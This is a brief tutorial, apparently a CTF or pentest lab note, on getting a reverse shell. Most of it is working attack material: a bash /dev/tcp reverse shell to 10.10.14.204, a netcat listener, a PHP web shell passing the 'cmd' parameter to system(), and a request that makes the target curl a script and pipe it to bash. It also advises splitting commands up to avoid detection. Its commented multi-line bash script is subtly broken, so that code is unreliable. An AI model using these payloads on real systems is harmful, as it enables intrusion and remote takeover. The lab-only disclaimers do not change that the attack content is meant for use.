Exploitation

Reverse Shell

Abstract

Summary
In ethical hacking, one technique involves uploading a script to a server to simulate remote command execution. This is often used in controlled environments for learning or penetration testing.


🛠️ Step-by-Step: Simulating a Reverse Shell in a Lab Environment

Step 1: Create a Shell Script

You can start by creating a basic shell script. This script is used to simulate a reverse connection from a target machine to your listener.

Instead of writing it all in one line, let’s break it down:

#!/bin/bash
# Start an interactive bash session
bash -i \
# Redirect standard output to a remote IP and port
>& /dev/tcp/10.10.14.204/1337 \
# Redirect standard input from the same connection
0>&1

⚠️ Note: This is for educational use only in a safe, isolated lab environment.


Step 2: Set Up a Listener on Your Machine

To receive the connection, you need to open a port on your machine. This is done using netcat:

# Listen on port 1337
nc -nvlp 1337

This command tells your system to wait for incoming connections on port 1337.


Step 3: Upload a Web Script to the Target

In a test environment, you might simulate uploading a script to a web server. Here’s an example of a very basic PHP script that can execute commands:

<?php
// This script executes a command passed via the "cmd" URL parameter
system($_GET["cmd"]);
?>

🧠 Tip: Always test this in a controlled lab. Never deploy such scripts on production systems.


Step 4: Trigger the Script via a Web Request

To execute the uploaded script, you can simulate a browser request like this:

http://<target-ip>/shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash

This tells the target to download and execute the shell script from your machine.


✅ Final Notes

  • Break down commands to avoid detection and improve understanding.
  • Always use these techniques in ethical hacking labs or CTF environments.
  • Never use these methods on unauthorized systems.